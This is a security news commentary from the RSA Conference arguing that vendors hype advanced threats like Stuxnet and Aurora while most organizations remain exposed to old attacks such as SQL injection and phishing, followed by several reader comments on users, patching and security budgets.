SAN FRANCISCO–It’s often said that after decades of work and technological advances, the security industry hasn’t actually solved any problems or made things any better. But that’s not entirely true. The industry has in fact perfected the art of exploiting the scare ’em and snare ’em, threat-of-the-moment mentality that’s turned security into a perpetual cash-generation machine. And it’s all for naught.

Nowhere is the state of this art clearer or on more flagrant display than at the RSA Conference here every year, a week-long industry love-in during which thousands of sales and marketing executives descend upon the city to mingle with dozens of actual security professionals. The agenda for the week is clear: Hammer home the fact that your product protects enterprises against <insert threat here>. The flavor of the week this time around was Stuxnet/Aurora/Iran/China/terrifying professional adversary.

For the most part, the idea that Product A, which was designed to address Threat A seven years ago, is now being touted as a perfect countermeasure to Threat B is treated as a harmless joke in the industry. Everyone does it. Threats come and go, so companies that want to stick around need to adapt. The threat from professional or state-sponsored attackers using super-sophisticated custom malware to compromise government agencies, banks, Google, nuclear plants and other high-profile targets is simply the latest iteration of that.

But the problem with this evolution is that attacks such as Stuxnet or Operation Aurora or GhostNet are not what most enterprises and organizations need to be worried about. The plain fact is that most organizations are falling far short in protecting against the same threats that they’ve faced for the last 10 years. SQL injection, phishing, malicious attachments, social engineering. Old, every one of them. And yet, still incredibly effective at compromising networks in some of the best-known and theoretically best-protected companies.

In other words, Stuxnet and Aurora have been owning networks around the world, without ever touching them.

Security researcher Michal Zalewski points out that all of the discussion in recent months of these highly targeted attacks has obscured the fact that this kind of attack not only is nothing new, it’s not even worth worrying about for most organizations.

“It is tempting to frame the constant stream of high-profile failures as a proof for the evolution of your adversary. But when you realize that almost every single large institution can probably be compromised by a moderately skilled attacker, this explanation just does not ring true. The inability to solve this increasingly pressing problem is no reason to celebrate – and even less of a reason to push for preposterous, unnecessary spending on silly intelligence services, or to promote overreaching and ill-defined regulation. If anything, it is a reason to reflect on our mistakes and perhaps go back to the drawing board,” Zalewski wrote in a blog post recently.

His point is well-made. And while it may be tempting to dismiss this line of thinking as just a thought exercise or hair-splitting about who the attackers are, that would be a mistake. Focusing on shadowy, highly-funded and motivated attackers that may be targeting your organization can divert your resources and personnel away from the less sexy and headline-worthy attackers who most definitely are targeting you.

The script kiddies that were defacing web sites and playing DDoS tag 10 years ago didn’t go away; they moved on to more profitable activities such as spear phishing and planting malware on your home page to exploit visitors. Doesn’t sound serious? Keep in mind that many of the victims of Operation Aurora were compromised through malicious PDFs attached to emails. None of these attacks is a joke and if you’re compromised, you don’t much care who did it in many cases. You just care that you’re owned.

But it’s important to remember when trying to discern the signal from the noise that determined attackers have always existed and they’ve always had the advantage. That’s not likely to change anytime soon, regardless of what scary mask they may be wearing at the moment or may don in the future.

Categories: Government, Vulnerabilities, Web Security

Comments (9)

  1. Anonymous

    At what point are we going to get back to focusing on people, process and how we leverage technology to secure data and systems rather than looking at technology being the solution? We as companies and individuals have gotten lazy and don’t want to put in the hard work necessary to be successful. We are looking for the “magic” pill to make us “thin” rather than focusing on the real issue. After all isn’t this really Information Security and not technology security (IT)?!

  2. Anonymous

    [quote]But the problem with this evolution is that attacks such as Stuxnet or Operation Aurora or GhostNet are not what most enterprises and organizations need to be worried about.[/quote]So, the lesson of Stuxnet is, Stuxnet is not the lesson we need to be learning.

    Wait, what?

  3. Anonymous

    It seems to me that even the so called “high-tech” malware still relies mostly on a user voluntarily doing something to activate the malware, such as inserting an infected USB drive in a computer, clicking on an unknown link, or downloading an unknown file.

    Perhaps the failure is due to the user, and perhaps the security/AV industry has done its job.  It is an impossible task to make someone be a safe user/surfer/employee.





  4. Anonymous

    How about as an example of the state of security. A security company selling “cutting edge” solutions to the NSA, CIA and global corporations, gets hacked using basic sql injection in a cms to grab the password hashes; poor password encryption allows passwords to be cracked and then password reuse and some social engineering allows the entire company to be owned.


    Peter ::

  5. Anonymous

    If only, for the average company, there was money in computer security! Fact is that your average company can spend as much time and money as it wants on security and still be vulnerable to a determined attack.

    I would posit that the majority of sysadmins are stretched way too thin to dedicate their time and effort to properly securing their systems. Instead relying on AV on the desktops and mail servers, and some sort of firewall product.

    Even if the average company does invest in ‘the best security specialists EVA!’, the best that this team can hope to show is that the network wasn’t penetrated. IE nothing happened. Which makes the bean counters beggar the question: Why are we paying you?

    And then there’s the fact that most security incidents go unnoticed for months, possibly years. Which equates to the aforementioned security team is only able to honestly say “we THINK the network wasn’t penetrated”.

    I’ve been in a situation to analyze network security for a number of organizations, from government departments, through to smaller private companies. And, for example, when I’ve asked – why are these systems so badly out of date? I hear lots of excuses:

    – They’re behind a firewall
    – They’re on nat so cant be contacted from outside
    – Our company isn’t really a valid target – no one out there is interested in our data
    – Five years ago we applied patch x to software y and it broke our main business app – so we don’t patch anymore unless we absolutely have to

    What these guy are really saying is: I’m way too busy to give this the attention it deserves.

    Security especially and IT generally are a business expense. The executives and bean counters are not asking “how do I make my systems secure?”. Rather their attitude is: IT is an expense that eats my profit margin, so how little can spend to maintain it and how do I avoid being charged with criminal negligence in the event of a breach?

    I’m sure there’s a lesson in that somewhere…. 

  6. Anonymous

    I agree with anonymous.  Also, the real problem is with people, not with the technology.  Information is only protected when getting to it is impossible for people to access it.  Remove people from the equation, problem solved. On the other hand, make all information public, that works too.

  7. Anonymous

    Agreed most of the problem with security is the unknown of the user; One can only teach what the users care to know. Network security is of no matter to them, How many times have you sat through the same informational piece stating not to click on links, dont install ‘X’ or to simply look at what you are doing.

    Most attacks can be achieved through social engineering leading to malware installs.

    The security teams can only do so much locking down a network when joe-blow likes going to pron sites all day.

  8. Anonymous

    Several of the presentations at RSA made the same argument, as well as at BSides. Nice to see you echo them here, but strange that you don’t mention any.

    You make it seem like RSA is one-sided and vendor-centric, but that’s hardly true. Presentations (outside of the for-profit Cloud Security Alliance) are not allowed to give pitches. The conference reviewers will pull any presentation material they see as a product “hammer”.

    Also, your write-up, and Zalewski’s, would benefit from differentiating between a view of threats and vulnerabilities. It also would benefit from mentioning asset value when speaking of compromises.

Comments are closed.